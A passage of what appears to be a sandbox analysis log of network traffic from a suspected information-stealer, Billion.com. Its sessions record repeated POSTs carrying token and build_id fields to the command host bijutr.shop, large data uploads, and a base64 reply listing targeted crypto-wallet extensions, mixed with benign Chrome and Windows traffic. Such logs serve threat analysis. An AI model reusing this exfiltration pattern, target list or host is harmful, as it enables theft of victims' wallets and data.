7 | 192.168.2.6 | 49818 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:48 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----26FU3EKF37QIE37Y5FUS
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:27:48 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: ------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26FU3EKF37QIE37Y5FUSCont
2024-12-24 18:27:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:49 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:27:49 UTC | 5837 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49824 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:50 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 332
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:27:50 UTC | 332 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: ------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7YCBIE37YCBAIEC26FCBCont
2024-12-24 18:27:51 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:51 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:27:51 UTC | 119 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49834 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:53 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----YCT0HVAS26FUAI5PZ5X4
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 6901
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:27:53 UTC | 6901 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: ------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------YCT0HVAS26FUAI5PZ5X4Cont
2024-12-24 18:27:54 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:53 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49835 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:54 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6PH4O89RQIEU37YMYCJ5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:27:54 UTC | 489 | OUT | Data Ascii: ------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------6PH4O89RQIEU37YMYCJ5Cont
2024-12-24 18:27:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:27:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:27:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
11 | 192.168.2.6 | 49841 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:56 UTC | 71 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 2f 77 31 65 5a 6a 72 58 45 79 6a 66 6a 54 4b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 62 36 62 64 36 62 65 33 37 62 37 64 65 31 0d 0a 0d 0a
Data Ascii: CNT 1 CON 305MS-CV: 1/w1eZjrXEyjfjTK.1Context: 54b6bd6be37b7de1
2024-12-24 18:27:56 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-24 18:27:56 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 1/w1eZjrXEyjfjTK.2Context: 54b6bd6be37b7de1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
2024-12-24 18:27:56 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1/w1eZjrXEyjfjTK.3Context: 54b6bd6be37b7de1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-24 18:27:57 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
Data Ascii: 202 1 CON 58
2024-12-24 18:27:57 UTC | 58 | IN | Data Raw: 4d 53 2d 43 56 3a 20 4b 4e 56 47 6a 31 79 46 67 30 6d 54 65 72 69 44 43 63 78 55 69 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
Data Ascii: MS-CV: KNVGj1yFg0mTeriDCcxUiQ.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49852 | 142.250.181.68 | 443 | 320 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:58 UTC | 603 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-24 18:27:59 UTC | 1266 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 18:27:58 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ZcKnd_S529o8QpWC2cvCTQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-24 18:27:59 UTC | 124 | IN | Data Ascii: 800)]}'["",["college football playoff","james gunn flash","barstool sports baltimore pizza","nintendo switch 2 console","
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 6c 61 6e 65 20 6b 69 66 66 69 6e 22 2c 22 70 61 72 69 73 20 65 69 66 66 65 6c 20 74 6f 77 65 72 20 66 69 72 65 22 2c 22 66 69 6e 63 65 6e 20 62 6f 69 20 72 65 70 6f 72 74 69 6e 67 20 69 6e 6a 75 6e 63 74 69 6f 6e 22 2c 22 74 68 65 20 6f 64 79 73 73 65 79 20 66 69 6c 6d 20 63 68 72 69 73 74 6f 70 68 65 72 20 6e 6f 6c 61 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f
                                                                                                                                                                                                                                                                                                        Data Ascii: lane kiffin","paris eiffel tower fire","fincen boi reporting injunction","the odyssey film christopher nolan"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","goo
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC541INData Raw: 56 70 71 53 30 4e 48 64 55 74 77 56 47 6c 70 56 47 70 52 57 55 46 34 4f 48 70 53 51 56 4e 57 52 44 4d 32 56 6e 52 30 4f 57 39 73 65 47 30 79 62 32 70 69 59 55 5a 31 62 6e 70 6f 57 6c 59 72 62 6e 42 35 4c 7a 64 55 4e 46 4e 55 62 46 52 46 64 55 78 79 5a 30 67 79 64 58 64 34 53 53 74 47 52 6b 68 48 5a 45 64 31 4b 7a 52 4e 4e 43 74 42 4e 55 4e 75 65 6c 6c 31 4f 46 4a 46 65 54 4e 76 56 57 6c 5a 65 56 68 47 51 55 5a 30 53 45 56 55 62 6d 56 34 61 6b 67 77 65 44 6c 4c 63 58 52 61 56 6b 78 68 53 57 4e 56 62 7a 63 76 51 55 70 35 55 6e 6c 57 57 45 6c 79 51 56 4d 77 56 57 74 42 62 6e 52 57 53 48 5a 58 64 58 4e 5a 62 6b 78 34 4d 33 52 69 57 6a 5a 59 57 56 6c 70 55 48 67 72 52 45 78 68 55 54 67 79 55 30 5a 69 61 6d 63 7a 61 47 74 6a 63 57 6f 7a 59 6c 70 31 4d 6c 51 30
                                                                                                                                                                                                                                                                                                        Data Ascii: VpqS0NHdUtwVGlpVGpRWUF4OHpSQVNWRDM2VnR0OW9seG0yb2piYUZ1bnpoWlYrbnB5LzdUNFNUbFRFdUxyZ0gydXd4SStGRkhHZEd1KzRNNCtBNUNuell1OFJFeTNvVWlZeVhGQUZ0SEVUbmV4akgweDlLcXRaVkxhSWNVbzcvQUp5UnlWWElyQVMwVWtBbnRWSHZXdXNZbkx4M3RiWjZYWVlpUHgrRExhUTgyU0ZiamczaGtjcWozYlp1MlQ0
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC89INData Raw: 35 33 0d 0a 65 69 74 53 64 45 68 48 55 54 51 72 4e 6e 56 4a 4e 48 42 43 53 32 35 47 4e 6a 5a 69 4d 6d 64 44 5a 6e 41 78 52 6c 42 58 54 33 68 6c 4d 57 52 70 4f 55 46 6b 53 32 73 34 53 46 46 71 62 55 38 35 52 55 63 30 64 55 4e 45 64 57 74 77 65 6e 4a 70 61 54 6b 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 53eitSdEhHUTQrNnVJNHBCS25GNjZiMmdDZnAxRlBXT3hlMWRpOUFkS2s4SFFqbU85RUc0dUNEdWtwenJpaTk
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1354INData Raw: 35 34 33 0d 0a 31 4d 6b 46 32 56 33 70 43 4f 46 45 34 62 45 31 31 52 57 73 76 4d 55 78 42 55 47 73 76 64 6c 52 36 56 44 6c 34 4e 6a 56 79 56 6b 52 43 59 33 6c 56 4e 46 42 6a 56 58 41 34 52 6d 74 68 59 58 4e 51 65 46 70 4c 54 45 35 7a 4c 30 6c 69 52 58 52 31 4d 33 46 73 63 55 52 54 53 46 46 43 62 46 68 56 4f 57 6c 6b 54 6b 39 6d 56 32 77 7a 59 56 63 33 64 6c 49 33 54 6b 56 71 65 54 4d 30 63 32 67 78 4f 54 52 32 53 6c 56 33 62 6c 4a 4a 55 30 4e 72 4e 6a 5a 6a 4f 48 42 36 4f 46 42 54 62 56 63 78 55 30 64 59 4d 6c 42 43 55 48 55 34 53 57 39 6a 4d 32 74 79 56 32 64 4c 55 31 52 72 59 55 56 49 55 32 78 69 4d 6d 68 58 61 56 4e 31 4e 30 31 54 5a 55 6c 71 64 32 70 70 51 58 6c 35 62 30 6b 7a 56 58 42 34 63 6d 70 49 56 46 5a 53 4c 31 6c 79 54 56 4e 6c 64 32 56 6c 59
                                                                                                                                                                                                                                                                                                        Data Ascii: 5431MkF2V3pCOFE4bE11RWsvMUxBUGsvdlR6VDl4NjVyVkRCY3lVNFBjVXA4RmthYXNQeFpLTE5zL0liRXR1M3FscURTSFFCbFhVOWlkTk9mV2wzYVc3dlI3TkVqeTM0c2gxOTR2SlV3blJJU0NrNjZjOHB6OFBTbVcxU0dYMlBCUHU4SW9jM2tyV2dLU1RrYUVIU2xiMmhXaVN1N01TZUlqd2ppQXl5b0kzVXB4cmpIVFZSL1lyTVNld2VlY
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
13          192.168.2.6  49853        142.250.181.68  443               320  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-24 18:27:58 UTC  506                OUT        GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-24 18:27:59 UTC  1018               IN         HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Tue, 24 Dec 2024 18:27:59 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC798INData Raw: 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                        Data Ascii: 3d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC398INData Raw: 31 38 37 0d 0a 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 6d 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 2e 6a 6f 69 6e 28 5c 22 20 5c 22 29 3a 5f 2e 6b 65 28 64 2c 63 29 29 3b 62 2e 6c 65 6e 67 74 68 5c 75 30 30 33 65 32 5c 75 30 30 32 36 5c 75 30 30 32 36 6e 65 28 61 2c 64 2c 62 29 3b 72 65 74 75 72 6e 20 64 7d 3b 6e 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63
                                                                                                                                                                                                                                                                                                        Data Ascii: 187const c\u003db[1],d\u003d_.me(a,String(b[0]));c\u0026\u0026(typeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\u003dc.join(\" \"):_.ke(d,c));b.length\u003e2\u0026\u0026ne(a,d,b);return d};ne\u003dfunction(a,b,c){func


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID    Process
14            192.168.2.6    49854          142.250.181.68    443                 320    C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp                  Bytes transferred    Direction    Data
2024-12-24 18:27:58 UTC    353                  OUT          GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-24 18:27:59 UTC    933                  IN           HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Tue, 24 Dec 2024 18:27:59 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-24 18:27:59 UTC    35                   IN           Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-24 18:27:59 UTC    5                    IN           Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
15            192.168.2.6    49874          188.245.216.205    443                 1396    C:\Users\user\AppData\Local\Temp\680662\Billion.com

Timestamp                  Bytes transferred    Direction    Data
2024-12-24 18:28:02 UTC    323                  OUT          POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----K6FKFKXLN7QQQI5PHDB1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:02 UTC    505                  OUT          Data Ascii: ------K6FKFKXLN7QQQI5PHDB1Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------K6FKFKXLN7QQQI5PHDB1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------K6FKFKXLN7QQQI5PHDB1Cont
2024-12-24 18:28:03 UTC    158                  IN           HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:03 UTC    12                   IN           Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
16            192.168.2.6    49877          188.245.216.205    443                 1396    C:\Users\user\AppData\Local\Temp\680662\Billion.com

Timestamp                  Bytes transferred    Direction    Data
2024-12-24 18:28:03 UTC    326                  OUT          POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----QIWBS2NOP8YU3ECBA1V3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:03 UTC    16355                OUT          Data Ascii: ------QIWBS2NOP8YU3ECBA1V3Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------QIWBS2NOP8YU3ECBA1V3Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------QIWBS2NOP8YU3ECBA1V3Cont
2024-12-24 18:28:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49884 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:05 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WLFCTR900ZUAAI58QQQ1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
